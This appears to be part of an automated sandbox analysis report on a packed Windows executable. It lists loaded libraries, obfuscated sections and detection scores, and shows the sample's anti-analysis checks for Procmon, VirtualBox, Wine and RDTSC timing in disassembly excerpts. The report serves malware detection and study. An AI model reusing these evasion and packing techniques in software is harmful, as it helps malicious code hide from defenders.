              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0100CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_0100CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\I74U08BM.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeReversingLabs: Detection: 39%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1774080 > 1048576
              Source: file.exeStatic PE information: Raw size of yuaygcvc is bigger than: 0x100000 < 0x197400

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.ff0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yuaygcvc:EW;tibvwtje:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yuaygcvc:EW;tibvwtje:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01016390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_01016390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1be33d should be: 0x1bb697
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: yuaygcvc
              Source: file.exeStatic PE information: section name: tibvwtje
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0147514E push edx; mov dword ptr [esp], ebx1_2_0147520C
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0147514E push 00B5FB1Fh; mov dword ptr [esp], edi1_2_01475217
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0142E953 push 3CF3B868h; mov dword ptr [esp], eax1_2_0142E9BF
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push ebp; mov dword ptr [esp], eax1_2_013A3127
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push 64E7C170h; mov dword ptr [esp], ebx1_2_013A3298
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push ebx; mov dword ptr [esp], 797B4233h1_2_013A32EB
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push ebx; mov dword ptr [esp], 6FFC07EDh1_2_013A3327
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push 5BF40EA7h; mov dword ptr [esp], esp1_2_013A3398
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push 62FDDA22h; mov dword ptr [esp], ebx1_2_013A3415
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push ebp; mov dword ptr [esp], edx1_2_013A344D
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push ebp; mov dword ptr [esp], eax1_2_013A350F
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push eax; mov dword ptr [esp], edi1_2_013A3537
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push 43B56F05h; mov dword ptr [esp], esp1_2_013A3696
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push 3095A3EAh; mov dword ptr [esp], ecx1_2_013A36AB
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push 4177696Fh; mov dword ptr [esp], ebx1_2_013A36C1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push esi; mov dword ptr [esp], edx1_2_013A3737
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push 6ED7A760h; mov dword ptr [esp], ebx1_2_013A37C5
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push 38E9686Ah; mov dword ptr [esp], esp1_2_013A3839
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push 254F17FFh; mov dword ptr [esp], edx1_2_013A3910
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push eax; mov dword ptr [esp], ebp1_2_013A3946
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push ecx; mov dword ptr [esp], 9F3470B6h1_2_013A3972
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push edx; mov dword ptr [esp], ebp1_2_013A39EA
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push ebp; mov dword ptr [esp], edx1_2_013A39F4
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push ebx; mov dword ptr [esp], 7F91D59Ah1_2_013A3A8E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push eax; mov dword ptr [esp], esi1_2_013A3C3F
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push ebp; mov dword ptr [esp], ecx1_2_013A3C4E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push 779F1502h; mov dword ptr [esp], eax1_2_013A3CF9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push ebx; mov dword ptr [esp], 7F76F154h1_2_013A3CFE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push ecx; mov dword ptr [esp], eax1_2_013A3DA7
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push eax; mov dword ptr [esp], ecx1_2_013A3DD9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A3123 push edx; mov dword ptr [esp], 169316CEh1_2_013A3DFC
              Source: file.exeStatic PE information: section name: yuaygcvc entropy: 7.953931532068962

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01016390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_01016390

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-25722
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240075 second address: 1240079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240079 second address: 124007F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124007F second address: 123F93B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c jmp 00007F76D8B73103h 0x00000011 popad 0x00000012 push dword ptr [ebp+122D0025h] 0x00000018 pushad 0x00000019 mov bx, AC91h 0x0000001d mov eax, 4CCD7585h 0x00000022 popad 0x00000023 call dword ptr [ebp+122D1C60h] 0x00000029 pushad 0x0000002a jmp 00007F76D8B73103h 0x0000002f xor eax, eax 0x00000031 mov dword ptr [ebp+122D204Bh], eax 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b jmp 00007F76D8B73102h 0x00000040 mov dword ptr [ebp+122D2AB0h], eax 0x00000046 jng 00007F76D8B73114h 0x0000004c mov esi, 0000003Ch 0x00000051 jne 00007F76D8B730F7h 0x00000057 cld 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c cmc 0x0000005d lodsw 0x0000005f jbe 00007F76D8B730F7h 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 pushad 0x0000006a xor dword ptr [ebp+122D204Bh], ebx 0x00000070 mov esi, 138C6E61h 0x00000075 popad 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a jo 00007F76D8B7310Bh 0x00000080 jmp 00007F76D8B73105h 0x00000085 nop 0x00000086 jp 00007F76D8B73104h 0x0000008c push eax 0x0000008d push eax 0x0000008e push edx 0x0000008f jnp 00007F76D8B730FCh 0x00000095 jc 00007F76D8B730F6h 0x0000009b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123F93B second address: 123F942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB24F second address: 13AB255 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123F921 second address: 123F93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F76D9315E56h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F76D9315E5Ch 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B376A second address: 13B3781 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8B73101h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3781 second address: 13B378B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F76D9315E56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3B76 second address: 13B3B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F76D8B730FFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F76D8B730F6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3B96 second address: 13B3B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3B9A second address: 13B3B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3B9E second address: 13B3BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3BA4 second address: 13B3BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B570D second address: 123F921 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76D9315E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b xor dword ptr [esp], 5B2B25ACh 0x00000012 jbe 00007F76D9315E56h 0x00000018 jns 00007F76D9315E5Ch 0x0000001e mov dword ptr [ebp+122D2EA2h], ecx 0x00000024 push dword ptr [ebp+122D0025h] 0x0000002a call dword ptr [ebp+122D1C60h] 0x00000030 pushad 0x00000031 jmp 00007F76D9315E63h 0x00000036 xor eax, eax 0x00000038 mov dword ptr [ebp+122D204Bh], eax 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 jmp 00007F76D9315E62h 0x00000047 mov dword ptr [ebp+122D2AB0h], eax 0x0000004d jng 00007F76D9315E74h 0x00000053 mov esi, 0000003Ch 0x00000058 jne 00007F76D9315E57h 0x0000005e cld 0x0000005f add esi, dword ptr [esp+24h] 0x00000063 cmc 0x00000064 lodsw 0x00000066 jbe 00007F76D9315E57h 0x0000006c add eax, dword ptr [esp+24h] 0x00000070 pushad 0x00000071 xor dword ptr [ebp+122D204Bh], ebx 0x00000077 mov esi, 138C6E61h 0x0000007c popad 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 jo 00007F76D9315E6Bh 0x00000087 jmp 00007F76D9315E65h 0x0000008c nop 0x0000008d jp 00007F76D9315E64h 0x00000093 pushad 0x00000094 push eax 0x00000095 push edx 0x00000096 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5790 second address: 13B579D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F76D8B730F6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B579D second address: 13B57C5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F76D9315E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jnl 00007F76D9315E64h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edx 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B57C5 second address: 13B5844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edx 0x00000009 jnl 00007F76D8B730FCh 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 je 00007F76D8B730FCh 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 pop eax 0x00000021 push edi 0x00000022 cld 0x00000023 pop ecx 0x00000024 push 00000003h 0x00000026 mov dx, bx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F76D8B730F8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov edx, 7250DEAAh 0x0000004a and si, 99D8h 0x0000004f push 00000003h 0x00000051 cmc 0x00000052 push E2979A9Ah 0x00000057 push eax 0x00000058 push edx 0x00000059 push edx 0x0000005a jmp 00007F76D8B73104h 0x0000005f pop edx 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5844 second address: 13B587F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F76D9315E56h 0x00000009 jp 00007F76D9315E56h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xor dword ptr [esp], 22979A9Ah 0x00000019 mov ch, 6Eh 0x0000001b lea ebx, dword ptr [ebp+12449669h] 0x00000021 mov esi, dword ptr [ebp+122D28B4h] 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F76D9315E61h 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B587F second address: 13B5884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5884 second address: 13B588A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B59D0 second address: 13B5A06 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F76D8B73104h 0x00000008 jmp 00007F76D8B730FEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jns 00007F76D8B73102h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push esi 0x00000020 pop esi 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5A06 second address: 13B5A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5A0C second address: 13B5A12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5A12 second address: 13B5A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5AA7 second address: 13B5B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8B73105h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dl, 8Ah 0x0000000f mov ecx, dword ptr [ebp+122D2B90h] 0x00000015 push 00000000h 0x00000017 movsx edx, cx 0x0000001a call 00007F76D8B730F9h 0x0000001f jmp 00007F76D8B73103h 0x00000024 push eax 0x00000025 jmp 00007F76D8B730FAh 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e pushad 0x0000002f pushad 0x00000030 ja 00007F76D8B730F6h 0x00000036 pushad 0x00000037 popad 0x00000038 popad 0x00000039 jno 00007F76D8B73100h 0x0000003f popad 0x00000040 mov eax, dword ptr [eax] 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F76D8B730FAh 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5B26 second address: 13B5B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F76D9315E56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5BD4 second address: 13B5BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F76D8B730F8h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5BE4 second address: 13B5C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F76D9315E5Ah 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007F76D9315E62h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007F76D9315E5Ch 0x00000021 pop eax 0x00000022 xor dword ptr [ebp+122D1BC5h], eax 0x00000028 lea ebx, dword ptr [ebp+1244967Dh] 0x0000002e or dx, 9F05h 0x00000033 xchg eax, ebx 0x00000034 push ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 jno 00007F76D9315E56h 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D491F second address: 13D495E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop esi 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 popad 0x00000011 jl 00007F76D8B73128h 0x00000017 jng 00007F76D8B730FEh 0x0000001d pushad 0x0000001e popad 0x0000001f jp 00007F76D8B730F6h 0x00000025 push eax 0x00000026 push edx 0x00000027 jp 00007F76D8B730F6h 0x0000002d jmp 00007F76D8B73102h 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4AF8 second address: 13D4B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4B03 second address: 13D4B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4B09 second address: 13D4B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4C6B second address: 13D4C7B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4C7B second address: 13D4C81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4C81 second address: 13D4C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c je 00007F76D8B730F6h 0x00000012 pop ebx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jbe 00007F76D8B730F6h 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4C9E second address: 13D4CA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4CA4 second address: 13D4CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4CA8 second address: 13D4CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4E81 second address: 13D4E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4E85 second address: 13D4E8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4E8C second address: 13D4E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5841 second address: 13D585C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F76D9315E66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D585C second address: 13D5864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5AEC second address: 13D5AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5AF0 second address: 13D5B00 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jo 00007F76D8B730F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5B00 second address: 13D5B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D9315E5Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5B10 second address: 13D5B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CC0C4 second address: 13CC0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB239 second address: 13AB23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB23D second address: 13AB24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F76D9315E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
